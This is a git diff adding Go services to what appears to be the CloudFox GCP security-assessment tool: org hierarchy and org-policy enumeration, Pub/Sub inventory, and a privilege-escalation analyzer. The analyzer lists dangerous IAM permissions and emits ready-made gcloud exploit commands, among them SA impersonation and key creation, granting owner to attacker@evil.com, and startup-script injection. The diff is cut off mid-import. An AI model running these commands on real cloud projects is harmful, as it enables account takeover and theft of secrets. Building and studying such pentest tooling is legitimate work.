return + } + + for _, folder := range folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNode := HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + Depth: depth, + Children: []HierarchyNode{}, + } + + // Recursively get child folders + s.buildFolderTree(&folderNode, folder.Name, depth+1) + + // Get projects under this folder + projects, err := s.SearchProjects(folder.Name) + if err == nil { + for _, proj := range projects { + projNode := HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: depth + 1, + } + folderNode.Children = append(folderNode.Children, projNode) + } + } + + parent.Children = append(parent.Children, folderNode) + } +} diff --git a/gcp/services/orgpolicyService/orgpolicyService.go b/gcp/services/orgpolicyService/orgpolicyService.go new file mode 100644 index 00000000..0eb96d7b --- /dev/null +++ b/gcp/services/orgpolicyService/orgpolicyService.go @@ -0,0 +1,223 @@ +package orgpolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/orgpolicy/v2" +) + +type OrgPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *OrgPolicyService { + return &OrgPolicyService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *OrgPolicyService { + return &OrgPolicyService{session: session} +} + +// OrgPolicyInfo represents an organization policy +type OrgPolicyInfo struct { + Name string `json:"name"` + Constraint string `json:"constraint"` + ProjectID string `json:"projectId"` + Enforced bool `json:"enforced"` + AllowAll bool `json:"allowAll"` + DenyAll bool `json:"denyAll"` + AllowedValues []string `json:"allowedValues"` + DeniedValues []string `json:"deniedValues"` + InheritParent bool `json:"inheritFromParent"` + Description string `json:"description"` +} + +// SecurityRelevantConstraints maps constraint names to their security implications +var SecurityRelevantConstraints = map[string]struct { + Description string + RiskWhenWeak string + DefaultSecure bool +}{ + // Domain restriction + "constraints/iam.allowedPolicyMemberDomains": { + Description: "Restricts IAM members to specific domains", + RiskWhenWeak: "Allows external users/accounts to be granted IAM permissions", + DefaultSecure: false, + }, + // Service account key creation + "constraints/iam.disableServiceAccountKeyCreation": { + Description: "Prevents service account key creation", + RiskWhenWeak: "Allows persistent SA key creation for long-term access", + DefaultSecure: false, + }, + "constraints/iam.disableServiceAccountKeyUpload": { + Description: "Prevents uploading service account keys", + RiskWhenWeak: "Allows external keys to be uploaded for SA access", + DefaultSecure: false, + }, + // Workload identity + "constraints/iam.workloadIdentityPoolProviders": { + Description: "Restricts workload identity pool providers", + RiskWhenWeak: "Allows external identity providers to assume GCP identities", + DefaultSecure: false, + }, + "constraints/iam.workloadIdentityPoolAwsAccounts": { + Description: "Restricts AWS accounts for workload identity", + RiskWhenWeak: "Allows any AWS account to assume GCP identity", + DefaultSecure: false, + }, + // Compute restrictions + "constraints/compute.requireShieldedVm": { + Description: "Requires Shielded VMs", + RiskWhenWeak: "Allows VMs without Shielded VM protections", + DefaultSecure: false, + }, + "constraints/compute.requireOsLogin": { + Description: "Requires OS Login for SSH access", + RiskWhenWeak: "Allows metadata-based SSH keys instead of centralized access", + DefaultSecure: false, + }, + "constraints/compute.vmExternalIpAccess": { + Description: "Restricts which VMs can have external IPs", + RiskWhenWeak: "Allows any VM to have an external IP", + DefaultSecure: false, + }, + "constraints/compute.disableSerialPortAccess": { + Description: "Disables serial port access to VMs", + RiskWhenWeak: "Allows serial console access to VMs", + DefaultSecure: false, + }, + "constraints/compute.disableNestedVirtualization": { + Description: "Disables nested virtualization", + RiskWhenWeak: "Allows nested VMs for potential sandbox escape", + DefaultSecure: false, + }, + // Storage restrictions + "constraints/storage.uniformBucketLevelAccess": { + Description: "Requires uniform bucket-level access", + RiskWhenWeak: "Allows ACL-based access which is harder to audit", + DefaultSecure: false, + }, + "constraints/storage.publicAccessPrevention": { + Description: "Prevents public access to storage buckets", + RiskWhenWeak: "Allows public bucket/object access", + DefaultSecure: false, + }, + // SQL restrictions + "constraints/sql.restrictPublicIp": { + Description: "Restricts public IPs on Cloud SQL", + RiskWhenWeak: "Allows Cloud SQL instances with public IPs", + DefaultSecure: false, + }, + "constraints/sql.restrictAuthorizedNetworks": { + Description: "Restricts authorized networks for Cloud SQL", + RiskWhenWeak: "Allows broad network access to Cloud SQL", + DefaultSecure: false, + }, + // GKE restrictions + "constraints/container.restrictPublicEndpoint": { + Description: "Restricts GKE public endpoints", + RiskWhenWeak: "Allows GKE clusters with public API endpoints", + DefaultSecure: false, + }, + // Resource location + "constraints/gcp.resourceLocations": { + Description: "Restricts resource locations/regions", + RiskWhenWeak: "Allows resources in any region (compliance risk)", + DefaultSecure: false, + }, + // Service usage + "constraints/serviceuser.services": { + Description: "Restricts which services can be enabled", + RiskWhenWeak: "Allows any GCP service to be enabled", + DefaultSecure: false, + }, + // VPC + "constraints/compute.restrictSharedVpcSubnetworks": { + Description: "Restricts Shared VPC subnetworks", + RiskWhenWeak: "Allows access to any Shared VPC subnetwork", + DefaultSecure: false, + }, + "constraints/compute.restrictVpnPeerIPs": { + Description: "Restricts VPN peer IPs", + RiskWhenWeak: "Allows VPN tunnels to any peer", + DefaultSecure: false, + }, +} + +// ListProjectPolicies lists all org policies for a project +func (s *OrgPolicyService) ListProjectPolicies(projectID string) ([]OrgPolicyInfo, error) { + ctx := context.Background() + var service *orgpolicy.Service + var err error + + if s.session != nil { + service, err = orgpolicy.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = orgpolicy.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") + } + + var policies []OrgPolicyInfo + parent := fmt.Sprintf("projects/%s", projectID) + + err = service.Projects.Policies.List(parent).Pages(ctx, func(resp *orgpolicy.GoogleCloudOrgpolicyV2ListPoliciesResponse) error { + for _, policy := range resp.Policies { + info := s.parsePolicyInfo(policy, projectID) + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") + } + + return policies, nil +} + +func (s *OrgPolicyService) parsePolicyInfo(policy *orgpolicy.GoogleCloudOrgpolicyV2Policy, projectID string) OrgPolicyInfo { + info := OrgPolicyInfo{ + Name: policy.Name, + ProjectID: projectID, + } + + // Extract constraint name from policy name + parts := strings.Split(policy.Name, "/policies/") + if len(parts) > 1 { + info.Constraint = "constraints/" + parts[1] + } + + // Get description from SecurityRelevantConstraints if available + if secInfo, ok := SecurityRelevantConstraints[info.Constraint]; ok { + info.Description = secInfo.Description + } + + // Parse the spec + if policy.Spec != nil { + info.InheritParent = policy.Spec.InheritFromParent + + for _, rule := range policy.Spec.Rules { + if rule == nil { + continue + } + + // In v2 API, these are booleans + info.Enforced = rule.Enforce + info.AllowAll = rule.AllowAll + info.DenyAll = rule.DenyAll + + if rule.Values != nil { + info.AllowedValues = append(info.AllowedValues, rule.Values.AllowedValues...) + info.DeniedValues = append(info.DeniedValues, rule.Values.DeniedValues...) + } + } + } + + return info +} + diff --git a/gcp/services/privescService/privescService.go b/gcp/services/privescService/privescService.go new file mode 100644 index 00000000..fe9c070d --- /dev/null +++ b/gcp/services/privescService/privescService.go @@ -0,0 +1,442 @@ +package privescservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iam/v1" +) + +type PrivescService struct { + session *gcpinternal.SafeSession +} + +func New() *PrivescService { + return &PrivescService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *PrivescService { + return &PrivescService{session: session} +} + +// PrivescPath represents a privilege escalation opportunity +type PrivescPath struct { + Principal string `json:"principal"` // Who has this capability + PrincipalType string `json:"principalType"` // user, serviceAccount, group + Method string `json:"method"` // The privesc method name + TargetResource string `json:"targetResource"` // What resource they can escalate on + Permissions []string `json:"permissions"` // Permissions enabling this + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM + Description string `json:"description"` // Explanation + ExploitCommand string `json:"exploitCommand"` // Command to exploit + ProjectID string `json:"projectId"` +} + +// DangerousPermission represents a permission that enables privilege escalation +type DangerousPermission struct { + Permission string `json:"permission"` + Category string `json:"category"` // SA Impersonation, Key Creation, IAM Modification, etc. + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM + Description string `json:"description"` // What this enables +} + +// GetDangerousPermissions returns the list of known dangerous GCP permissions +func GetDangerousPermissions() []DangerousPermission { + return []DangerousPermission{ + // Service Account Impersonation - CRITICAL + {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate access tokens for any SA"}, + {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign blobs as SA (GCS signed URLs)"}, + {Permission: "iam.serviceAccounts.signJwt", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign JWTs as SA (impersonation)"}, + {Permission: "iam.serviceAccounts.implicitDelegation", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Delegate SA identity to others"}, + + // Key Creation - CRITICAL + {Permission: "iam.serviceAccountKeys.create", Category: "Key Creation", RiskLevel: "CRITICAL", Description: "Create persistent SA keys"}, + {Permission: "storage.hmacKeys.create", Category: "Key Creation", RiskLevel: "HIGH", Description: "Create HMAC keys for S3-compatible access"}, + + // IAM Modification - CRITICAL + {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project-level IAM policy"}, + {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder-level IAM policy"}, + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org-level IAM policy"}, + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to service accounts"}, + {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify custom role permissions"}, + {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create new custom roles"}, + + // Compute Access - HIGH + {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify instance metadata (SSH keys, startup scripts)"}, + {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance service account"}, + {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify project-wide metadata"}, + {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH into instances via OS Login"}, + {Permission: "compute.instances.osAdminLogin", Category: "Compute", RiskLevel: "HIGH", Description: "SSH with sudo via OS Login"}, + + // Cloud Functions - HIGH + {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA identity"}, + {Permission: "cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code/SA"}, + {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Change function source code"}, + + // Cloud Run - HIGH + {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA identity"}, + {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service code/SA"}, + + // Cloud Build - HIGH + {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "HIGH", Description: "Run builds with Cloud Build SA"}, + {Permission: "cloudbuild.builds.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify build configurations"}, + + // GKE - HIGH + {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get GKE cluster credentials"}, + {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods"}, + {Permission: "container.secrets.get", Category: "GKE", RiskLevel: "HIGH", Description: "Read Kubernetes secrets"}, + + // Storage - MEDIUM + {Permission: "storage.buckets.setIamPolicy", Category: "Storage", RiskLevel: "MEDIUM", Description: "Modify bucket access"}, + {Permission: "storage.objects.create", Category: "Storage", RiskLevel: "MEDIUM", Description: "Upload objects to buckets"}, + + // Secrets - HIGH + {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values"}, + {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets", RiskLevel: "HIGH", Description: "Grant access to secrets"}, + + // Org Policies - HIGH + {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "HIGH", Description: "Modify organization policies"}, + + // Deployment Manager - HIGH + {Permission: "deploymentmanager.deployments.create", Category: "Deployment", RiskLevel: "HIGH", Description: "Deploy resources with DM SA"}, + + // API Keys - MEDIUM + {Permission: "serviceusage.apiKeys.create", Category: "API Keys", RiskLevel: "MEDIUM", Description: "Create API keys"}, + + // Actor permissions + {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation"}, + } +} + +// AnalyzeProjectPrivesc analyzes a project for privilege escalation paths +func (s *PrivescService) AnalyzeProjectPrivesc(projectID string) ([]PrivescPath, error) { + ctx := context.Background() + + // Get project IAM policy + var crmService *cloudresourcemanager.Service + var err error + + if s.session != nil { + crmService, err = cloudresourcemanager.NewService(ctx, s.session.GetClientOption()) + } else { + crmService, err = cloudresourcemanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + policy, err := crmService.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var paths []PrivescPath + + // Get IAM service for role resolution + var iamService *iam.Service + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + // Continue without role resolution + iamService = nil + } + + // Analyze each binding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + + // Get permissions for this role + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + + // Check each member for dangerous permissions + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForPrivesc(member, binding.Role, permissions, projectID) + paths = append(paths, memberPaths...) + } + } + + return paths, nil +} + +// getRolePermissions resolves a role to its permissions +func (s *PrivescService) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { + if iamService == nil { + return []string{} + } + + ctx := context.Background() + + // Handle different role types + var roleInfo *iam.Role + var err error + + if strings.HasPrefix(role, "roles/") { + // Predefined role + roleInfo, err = iamService.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "projects/") { + // Project custom role + roleInfo, err = iamService.Projects.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "organizations/") { + // Org custom role + roleInfo, err = iamService.Organizations.Roles.Get(role).Do() + } else { + // Assume predefined role format + roleInfo, err = iamService.Roles.Get("roles/" + role).Do() + } + + if err != nil { + // Try to query testable permissions as fallback + return s.getTestablePermissions(ctx, iamService, role, projectID) + } + + return roleInfo.IncludedPermissions +} + +// getTestablePermissions uses QueryTestablePermissions for complex cases +func (s *PrivescService) getTestablePermissions(ctx context.Context, iamService *iam.Service, role string, projectID string) []string { + // This is a simplified version - in production you'd want more robust handling + // For now, return known permissions for common roles + knownRoles := map[string][]string{ + "roles/owner": { + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccountKeys.create", + "resourcemanager.projects.setIamPolicy", + "compute.instances.setMetadata", + }, + "roles/editor": { + "compute.instances.setMetadata", + "cloudfunctions.functions.create", + "run.services.create", + }, + "roles/iam.serviceAccountAdmin": { + "iam.serviceAccountKeys.create", + "iam.serviceAccounts.setIamPolicy", + }, + "roles/iam.serviceAccountKeyAdmin": { + "iam.serviceAccountKeys.create", + }, + "roles/iam.serviceAccountTokenCreator": { + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccounts.signBlob", + "iam.serviceAccounts.signJwt", + }, + "roles/compute.instanceAdmin": { + "compute.instances.setMetadata", + "compute.instances.setServiceAccount", + }, + "roles/cloudfunctions.developer": { + "cloudfunctions.functions.create", + "cloudfunctions.functions.update", + }, + "roles/run.admin": { + "run.services.create", + "run.services.update", + }, + "roles/cloudbuild.builds.editor": { + "cloudbuild.builds.create", + }, + } + + if perms, ok := knownRoles[role]; ok { + return perms + } + + return []string{} +} + +// analyzePermissionsForPrivesc checks if a set of permissions enables privilege escalation +func (s *PrivescService) analyzePermissionsForPrivesc(member, role string, permissions []string, projectID string) []PrivescPath { + var paths []PrivescPath + + dangerousPerms := GetDangerousPermissions() + dangerousMap := make(map[string]DangerousPermission) + for _, dp := range dangerousPerms { + dangerousMap[dp.Permission] = dp + } + + // Check for direct dangerous permissions + foundDangerous := make(map[string]DangerousPermission) + for _, perm := range permissions { + if dp, ok := dangerousMap[perm]; ok { + foundDangerous[perm] = dp + } + } + + // Generate privesc paths based on found permissions + principalType := getPrincipalType(member) + cleanMember := cleanMemberName(member) + + // SA Token Creation + if dp, ok := foundDangerous["iam.serviceAccounts.getAccessToken"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SA Token Creation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can generate access tokens for any service account in the project", + ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), + ProjectID: projectID, + }) + } + + // SA Key Creation + if dp, ok := foundDangerous["iam.serviceAccountKeys.create"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SA Key Creation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can create persistent keys for any service account", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), + ProjectID: projectID, + }) + } + + // Project IAM Modification + if dp, ok := foundDangerous["resourcemanager.projects.setIamPolicy"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Project IAM Modification", + TargetResource: projectID, + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can modify project IAM policy to grant any role", + ExploitCommand: fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:attacker@evil.com --role=roles/owner", projectID), + ProjectID: projectID, + }) + } + + // Compute Metadata Modification + if dp, ok := foundDangerous["compute.instances.setMetadata"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Compute Metadata Injection", + TargetResource: "All project instances", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can inject SSH keys or startup scripts into instances", + ExploitCommand: "gcloud compute instances add-metadata INSTANCE --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'", + ProjectID: projectID, + }) + } + + // Cloud Functions Deployment + if _, ok := foundDangerous["cloudfunctions.functions.create"]; ok { + if _, hasActAs := foundDangerous["iam.serviceAccounts.actAs"]; hasActAs { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Cloud Functions SA Abuse", + TargetResource: "Cloud Functions", + Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, + RiskLevel: "HIGH", + Description: "Can deploy functions with privileged service account identity", + ExploitCommand: "gcloud functions deploy pwned --runtime=python39 --trigger-http --service-account=PRIVILEGED_SA", + ProjectID: projectID, + }) + } + } + + // Cloud Build + if dp, ok := foundDangerous["cloudbuild.builds.create"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Cloud Build SA Abuse", + TargetResource: "Cloud Build", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can run builds with Cloud Build service account (often has elevated privileges)", + ExploitCommand: "gcloud builds submit --config=cloudbuild.yaml .", + ProjectID: projectID, + }) + } + + // GKE Credentials + if dp, ok := foundDangerous["container.clusters.getCredentials"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "GKE Cluster Access", + TargetResource: "All project GKE clusters", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can get credentials for GKE clusters", + ExploitCommand: "gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE", + ProjectID: projectID, + }) + } + + // Secret Access + if dp, ok := foundDangerous["secretmanager.versions.access"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Secret Access", + TargetResource: "All project secrets", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can read secret values from Secret Manager", + ExploitCommand: "gcloud secrets versions access latest --secret=SECRET_NAME", + ProjectID: projectID, + }) + } + + // SignBlob for GCS Signed URLs + if dp, ok := foundDangerous["iam.serviceAccounts.signBlob"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "GCS Signed URL Generation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can sign blobs as SA to generate GCS signed URLs", + ExploitCommand: "gsutil signurl -u TARGET_SA@project.iam.gserviceaccount.com gs://bucket/object", + ProjectID: projectID, + }) + } + + return paths +} + +// getPrincipalType determines the type of principal from the member string +func getPrincipalType(member string) string { + if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } else if member == "allUsers" { + return "allUsers" + } else if member == "allAuthenticatedUsers" { + return "allAuthenticatedUsers" + } + return "unknown" +} + +// cleanMemberName removes the prefix from member string +func cleanMemberName(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} diff --git a/gcp/services/pubsubService/pubsubService.go b/gcp/services/pubsubService/pubsubService.go new file mode 100644 index 00000000..89fdbb9b --- /dev/null +++ b/gcp/services/pubsubService/pubsubService.go @@ -0,0 +1,293 @@ +package pubsubservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + pubsub "google.golang.org/api/pubsub/v1" +) + +type PubSubService struct{} + +func New() *PubSubService { + return &PubSubService{} +} + +// IAMBinding represents a single IAM role/member binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// TopicInfo holds Pub/Sub topic details with security-relevant information +type TopicInfo struct { + Name string + ProjectID string + KmsKeyName string // Encryption key if set + MessageRetentionDuration string + SchemaSettings string + Labels map[string]string + + // IAM bindings + IAMBindings []IAMBinding + + // Subscriptions count + SubscriptionCount int +} + +// SubscriptionInfo holds Pub/Sub subscription details +type SubscriptionInfo struct { + Name string + ProjectID string + Topic string + TopicProject string // Topic may be in different project + + // Configuration + AckDeadlineSeconds int64 + MessageRetention string + RetainAckedMessages bool + ExpirationPolicy string // TTL + Filter string + + // Push configuration + PushEndpoint string // Empty if pull subscription + PushOIDCAudience string + PushServiceAccount string + + // Dead letter + DeadLetterTopic string + MaxDeliveryAttempts int64 + + // BigQuery export + BigQueryTable string + + // Cloud Storage export + CloudStorageBucket string + + // IAM bindings + IAMBindings []IAMBinding +} + +// Topics retrieves all Pub/Sub topics in a project +func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { + ctx := context.Background() + + service, err := pubsub.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + var topics []TopicInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Topics.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListTopicsResponse) error { + for _, topic := range page.Topics { + info := parseTopicInfo(topic, projectID) + + // Get subscription count + subCount, _ := ps.getTopicSubscriptionCount(service, topic.Name) + info.SubscriptionCount = subCount + + // Try to get IAM policy + iamPolicy, iamErr := ps.getTopicIAMPolicy(service, topic.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings = parseIAMBindings(iamPolicy) + } + + topics = append(topics, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + return topics, nil +} + +// Subscriptions retrieves all Pub/Sub subscriptions in a project +func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, error) { + ctx := context.Background() + + service, err := pubsub.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + var subscriptions []SubscriptionInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Subscriptions.List(parent) + err = call.Pages(ctx, func(page *pubsub.ListSubscriptionsResponse) error { + for _, sub := range page.Subscriptions { + info := parseSubscriptionInfo(sub, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := ps.getSubscriptionIAMPolicy(service, sub.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings = parseIAMBindings(iamPolicy) + } + + subscriptions = append(subscriptions, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + return subscriptions, nil +} + +// parseTopicInfo extracts relevant information from a Pub/Sub topic +func parseTopicInfo(topic *pubsub.Topic, projectID string) TopicInfo { + info := TopicInfo{ + Name: extractName(topic.Name), + ProjectID: projectID, + Labels: topic.Labels, + } + + if topic.KmsKeyName != "" { + info.KmsKeyName = topic.KmsKeyName + } + + if topic.MessageRetentionDuration != "" { + info.MessageRetentionDuration = topic.MessageRetentionDuration + } + + if topic.SchemaSettings != nil { + info.SchemaSettings = fmt.Sprintf("%s (%s)", + extractName(topic.SchemaSettings.Schema), + topic.SchemaSettings.Encoding) + } + + return info +} + +// parseSubscriptionInfo extracts relevant information from a Pub/Sub subscription +func parseSubscriptionInfo(sub *pubsub.Subscription, projectID string) SubscriptionInfo { + info := SubscriptionInfo{ + Name: sub.Name, + ProjectID: projectID, + Topic: extractName(sub.Topic), + AckDeadlineSeconds: sub.AckDeadlineSeconds, + RetainAckedMessages: sub.RetainAckedMessages, + Filter: sub.Filter, + } + + // Extract name from full path + info.Name = extractName(sub.Name) + + // Extract topic project (may be different from subscription project) + if strings.Contains(sub.Topic, "/") { + parts := strings.Split(sub.Topic, "/") + if len(parts) >= 2 { + info.TopicProject = parts[1] + } + } + + // Message retention + if sub.MessageRetentionDuration != "" { + info.MessageRetention = sub.MessageRetentionDuration + } + + // Expiration policy + if sub.ExpirationPolicy != nil && sub.ExpirationPolicy.Ttl != "" { + info.ExpirationPolicy = sub.ExpirationPolicy.Ttl + } + + // Push configuration + if sub.PushConfig != nil { + info.PushEndpoint = sub.PushConfig.PushEndpoint + + if sub.PushConfig.OidcToken != nil { + info.PushServiceAccount = sub.PushConfig.OidcToken.ServiceAccountEmail + info.PushOIDCAudience = sub.PushConfig.OidcToken.Audience + } + } + + // Dead letter policy + if sub.DeadLetterPolicy != nil { + info.DeadLetterTopic = extractName(sub.DeadLetterPolicy.DeadLetterTopic) + info.MaxDeliveryAttempts = sub.DeadLetterPolicy.MaxDeliveryAttempts + } + + // BigQuery config + if sub.BigqueryConfig != nil { + info.BigQueryTable = sub.BigqueryConfig.Table + } + + // Cloud Storage config + if sub.CloudStorageConfig != nil { + info.CloudStorageBucket = sub.CloudStorageConfig.Bucket + } + + return info +} + +// getTopicSubscriptionCount counts subscriptions for a topic +func (ps *PubSubService) getTopicSubscriptionCount(service *pubsub.Service, topicName string) (int, error) { + ctx := context.Background() + + resp, err := service.Projects.Topics.Subscriptions.List(topicName).Context(ctx).Do() + if err != nil { + return 0, err + } + + return len(resp.Subscriptions), nil +} + +// getTopicIAMPolicy retrieves the IAM policy for a topic +func (ps *PubSubService) getTopicIAMPolicy(service *pubsub.Service, topicName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Topics.GetIamPolicy(topicName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// getSubscriptionIAMPolicy retrieves the IAM policy for a subscription +func (ps *PubSubService) getSubscriptionIAMPolicy(service *pubsub.Service, subscriptionName string) (*pubsub.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Subscriptions.GetIamPolicy(subscriptionName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseIAMBindings extracts all IAM bindings from a policy +func parseIAMBindings(policy *pubsub.Policy) []IAMBinding { + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/resourceIAMService/resourceIAMService.go b/gcp/services/resourceIAMService/resourceIAMService.go new file mode 100644 index 00000000..dbea1fb2 --- /dev/null +++ b/gcp/services/resourceIAMService/resourceIAMService.go @@ -0,0 +1,649 @@ +package resourceiamservice + +import ( + "context" + "fmt" + "strings" + + "cloud.google.com/go/bigquery" + "cloud.google.com/go/kms/apiv1" + "cloud.google.com/go/kms/apiv1/kmspb" + "cloud.google.com/go/pubsub" + "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + run "google.golang.org/api/run/v1" + secretmanager "google.golang.org/api/secretmanager/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" + cloudfunctions 